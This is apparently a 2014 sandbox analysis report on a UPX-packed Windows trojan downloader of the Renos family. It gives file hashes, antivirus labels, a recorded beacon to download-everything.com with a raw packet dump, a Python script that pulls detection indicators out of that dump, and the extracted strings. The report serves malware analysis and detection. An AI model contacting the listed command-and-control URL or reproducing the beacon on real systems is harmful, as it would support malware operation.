Analysis Date: 2014-02-01 10:49:09
MD5: 5e580e2873d14e6c68fd20853b50d125
SHA1: 2a2bd5a292ab0dcdc4c4c20b3482451b29176fe7

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section UPX0: md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
  (raw size 0: the two hashes are those of empty input. UPX0 holds no bytes on disk and only reserves the virtual range into which the stub decompresses the original image, so this is expected for a UPX-packed file, not a corrupt section.)
Section UPX1: md5: a01048fe6cd4cd0ab4b88eee772dcc86 sha1: 3720f9604c09eec81949c27fb9383698a8377aac size: 27136
  (compressed original image plus the decompression stub)
Section UPX2: md5: 8af5f72451e07221d9ca1b5b93f28b64 sha1: ac6a5464f185186650343ac8dba785e1dc961fc2 size: 512
  (the small third section UPX emits for the stub's own import table)
Timestamp: 2009-01-24 19:16:55
  (PE header compile timestamp; it is attacker-controlled and easily forged, so treat it as a hint, not evidence of build date)
Packer: UPX -> www.upx.sourceforge.net
PEhash: 875cb952ee590ba3fbae18bcb78002fc6be72dde
AV (avira): TR/Downloader.Gen
AV (msse): TrojanDownloader:Win32/Renos.gen!BB
AV (clamav): Trojan.Downloader-75896
AV (mcafee): Downloader-BNK
AV (avg): Downloader.Generic8.SNA
All five engines agree on a generic downloader classification (Microsoft assigns it to the Renos family), which matches the runtime behaviour below: a single outbound HTTP GET and no other recorded activity.

Runtime Details:

Screenshot

Process:
↳ C:\malware.exe

Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\RFC1156Agent\CurrentVersion\Parameters\TrapPollTimeMilliSecs ➝ 15000
  (This key belongs to the Windows SNMP trap service and 15000 is its usual default, so the entry is more likely sandbox background activity than something the sample configured. Nothing in the recorded activity writes a Run key, installs a service or creates a scheduled task: the report shows no persistence mechanism for this sample.)

Network Details:

DNS: download-everything.com
  Type: A
  208.73.211.66
HTTP GET: http://download-everything.com/lr/11.php?data=z/cJFvo/QuSxI04Jc6NKAUrmWCrCWqHsj1FYMbdDBtn2kyYDIVdbMUIDNGgGNLZrPutWAI7dsQ==
  User-Agent: wget 3.0
Flows: TCP 192.168.1.1:1031 ➝ 208.73.211.66:80

Notes on the beacon: the "data" parameter is 76 base64 characters that decode to 55 bytes beginning 0xCF 0xF7 0x09, so the check-in payload is encoded or encrypted rather than plain text. The User-Agent is a usable network signature: GNU Wget identifies itself as "Wget/<version>", never as a lowercase "wget 3.0". Only the request is captured; no response appears in the report, so this page does not say whether download-everything.com was still serving anything at analysis time.

Raw Pcap
0x00000000 (00000)   47455420 2f6c722f 31312e70 68703f64   GET /lr/11.php?d
0x00000010 (00016)   6174613d 7a2f634a 46766f2f 51755378   ata=z/cJFvo/QuSx
0x00000020 (00032)   4930344a 63364e4b 4155726d 57437243   I04Jc6NKAUrmWCrC
0x00000030 (00048)   57714873 6a314659 4d626444 42746e32   WqHsj1FYMbdDBtn2
0x00000040 (00064)   6b795944 49566462 4d554944 4e476747   kyYDIVdbMUIDNGgG
0x00000050 (00080)   4e4c5a72 50757457 41493764 73513d3d   NLZrPutWAI7dsQ==
0x00000060 (00096)   20485454 502f312e 310d0a55 7365722d    HTTP/1.1..User-
0x00000070 (00112)   4167656e 743a2077 67657420 332e300d   Agent: wget 3.0.
0x00000080 (00128)   0a486f73 743a2064 6f776e6c 6f61642d   .Host: download-
0x00000090 (00144)   65766572 79746869 6e672e63 6f6d0d0a   everything.com..
0x000000a0 (00160)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x000000b0 (00176)   6f2d6361 6368650d 0a0d0a              o-cache....
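The request recorded in the Raw Pcap dump above, reconstructed from the hex columns and broken down into the indicators a detection engineer would lift from it (host, path, User-Agent, decoded query payload). This is an added example and not output of the sandbox or code from the report: the hex dump embedded below is copied from the report, while the parsing code, the indicator field names and the Wget User-Agent heuristic are the example's own.

```python
"""
Reconstruct the HTTP request from a sandbox "Raw Pcap" hex dump and pull the
network indicators out of it. Added example, not code from the sandbox or the
report: RAW_PCAP is copied from the report's Raw Pcap section; the parsing,
the indicator names and the Wget User-Agent heuristic are this example's own.
"""
import base64
import math
import re
from urllib.parse import unquote

# Copied from the report's Raw Pcap section (the only packet it shows).
RAW_PCAP = """\
0x00000000 (00000)   47455420 2f6c722f 31312e70 68703f64   GET /lr/11.php?d
0x00000010 (00016)   6174613d 7a2f634a 46766f2f 51755378   ata=z/cJFvo/QuSx
0x00000020 (00032)   4930344a 63364e4b 4155726d 57437243   I04Jc6NKAUrmWCrC
0x00000030 (00048)   57714873 6a314659 4d626444 42746e32   WqHsj1FYMbdDBtn2
0x00000040 (00064)   6b795944 49566462 4d554944 4e476747   kyYDIVdbMUIDNGgG
0x00000050 (00080)   4e4c5a72 50757457 41493764 73513d3d   NLZrPutWAI7dsQ==
0x00000060 (00096)   20485454 502f312e 310d0a55 7365722d    HTTP/1.1..User-
0x00000070 (00112)   4167656e 743a2077 67657420 332e300d   Agent: wget 3.0.
0x00000080 (00128)   0a486f73 743a2064 6f776e6c 6f61642d   .Host: download-
0x00000090 (00144)   65766572 79746869 6e672e63 6f6d0d0a   everything.com..
0x000000a0 (00160)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x000000b0 (00176)   6f2d6361 6368650d 0a0d0a              o-cache....
"""

HEX_GROUP = re.compile(r"^[0-9a-f]{2,8}$")
# GNU Wget identifies itself as "Wget/<version> (...)"; a User-Agent that
# merely says "wget" in some other shape is hand-written and worth alerting on.
REAL_WGET_UA = re.compile(r"^Wget/\d+\.\d+")


def hexdump_to_bytes(dump: str) -> bytes:
    """Drop the offset and ASCII columns of each dump line, keep the hex groups."""
    out = bytearray()
    for line in dump.splitlines():
        tokens = line.split()
        if len(tokens) < 3 or not tokens[0].startswith("0x"):
            continue
        # At most four 4-byte groups follow "0xOFFSET (DECIMAL)". The ASCII
        # column starts right after them; stop at the first non-hex token.
        for tok in tokens[2:6]:
            if HEX_GROUP.match(tok) and len(tok) % 2 == 0:
                out += bytes.fromhex(tok)
            else:
                break
    return bytes(out)


def parse_http_request(raw: bytes) -> dict:
    """Split a raw HTTP/1.x request into request line, headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


def query_params(target: str) -> dict:
    """Parse the query string undoing only percent-encoding. parse_qs would
    also turn '+' into ' ', which silently corrupts base64 payloads."""
    _, _, query = target.partition("?")
    params = {}
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[unquote(key)] = unquote(value)
    return params


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: text sits around 4-5; encrypted data approaches the
    log2(len) ceiling that a short buffer allows."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n)
                for c in (data.count(bytes([b])) for b in set(data)))


def extract_indicators(dump: str) -> dict:
    """Everything worth lifting from this single beacon, as one record."""
    req = parse_http_request(hexdump_to_bytes(dump))
    path = req["target"].partition("?")[0]
    payload_b64 = query_params(req["target"]).get("data", "")
    try:
        payload = base64.b64decode(payload_b64, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        payload = b""
    ua = req["headers"].get("user-agent", "")
    host = req["headers"].get("host", "")
    return {
        "method": req["method"],
        "host": host,
        "path": path,
        "url": f"http://{host}{path}",
        "user_agent": ua,
        "user_agent_is_real_wget": REAL_WGET_UA.match(ua) is not None,
        "payload": payload,
        "payload_len": len(payload),
        "payload_printable": all(0x20 <= b < 0x7F for b in payload),
        "payload_entropy": round(shannon_entropy(payload), 2),
    }


if __name__ == "__main__":
    for key, value in extract_indicators(RAW_PCAP).items():
        print(f"{key:24} {value!r}")
```

The reconstructed stream is 187 bytes and parses cleanly as one HTTP/1.1 request. The decoded "data" value is 55 bytes and begins with non-ASCII bytes, so it is not plain text; the report carries no response, so what the server answered is not recoverable from this page.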


Strings (extracted from the packed file, so mostly compressed data; the readable entries are the UPX stub's own import table: KERNEL32.DLL with LoadLibraryA, GetProcAddress, VirtualAlloc, VirtualFree, VirtualProtect and ExitProcess, plus one function per original DLL so the loader maps it before the stub resolves the rest at unpack time: InternetOpenA for WININET.dll, the mangled std::basic_string::npos symbol for MSVCP60.dll, and OLEAUT32.dll and MSVCRT.dll. InternetOpenA ties the binary to the WinINet request recorded under Network Details.)
b...
BL.
.
.
b...
BL.
-./()*+
$%&' !"#,
}1HQMF
1n$|$ 
?`1$QK
1:'-@T
3H4=*-
>4_/^^
4MxlP@0$
4*&R(-@
-5~9)|v.
5f7Ux`
6.|^5R
6v#Fh	
>?8959
<9~d<A
9YTU`V
A19nBfos
 A9<_"
aDPbO\X@
[ag$}4
.?AV_com_error@@
b6to[@
B?ssign_T
B&XVo	9
c2_@+A$
c~'$(4
calFre
CA"`ZMf
CB:1p%a	>
cs;8=-
=daL-QQS
dHIqhJ7
diV>?oj
DK%p"Ru
 Dv%N2L%'
E@er%c
EFG@ABCLM
ExitProcess
f7R89)@
FB6~|XQ
FF&lpt
/F!S^_
\FX.@s	n
g`abclmnohijktuvwpqrs|}~45670123
G/ci{D^O
GetProcAddress
G:fp[I
|[g\]Z
`HgUoHG
h(uH9]
HvTNG!
h|wExcep
>hXV8!
=I9h6?
II@ZY?H
InternetOpenA
j1TA5@gZ
)J2]Ta
/J>rInpos2I/
kBmFSn
\kedDec8m
KeR7z\H
KERNEL32.DLL
)KHK^_
K`X}P~*
labl^HHL"
LibrCy
LoadLibraryA
Me<d`ICh
Mj.m^X
Mod*eHand
MSVCP60.dll
MSVCRT.dll
M"tVdA
N55*AU
Ndae0f
=N"LuY
&N,m_O
NNN456
NNstEJuNNN
NOHIJKT(QRS\]^ef
?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB
)<+ofF
O **!j
OLEAUT32.dll
&olfp0lwrX
(PBDU_C@
pgwcsl
@_P!ik
p_/]Io.@
P`Ow1*
pPJYk_A
PvwxyNN
<	q5di]
QAEA)12
Qj03:Y
(QVQhf
rDrX,h
*RUF,9 
\S7F"R6
swR^M:
swUQXR
t""3D't
td;V{;
!This program cannot be run in DOS mode.
tiByteToWideCharlstrlenA	
!t:KL1]
t^p_m`
<+tP</tL<
t_Y\]c6
type_info@
.)&UW[
uWVMQS
VirtualAlloc
VirtualFree
VirtualProtect
VKVj{"
V]TP;V
vWC"tIz
WININET.dll
XE\`I&
XM%sTO	
XMV	 rRc=
XPM"/,+
XPTPSW
:Y&8Ib
YA7vDfE^0R0
YK6LP0Q
Yl$[:`B@6
;YQRElSe
?'Ywkd
Z~\<az~T
*ZoqV6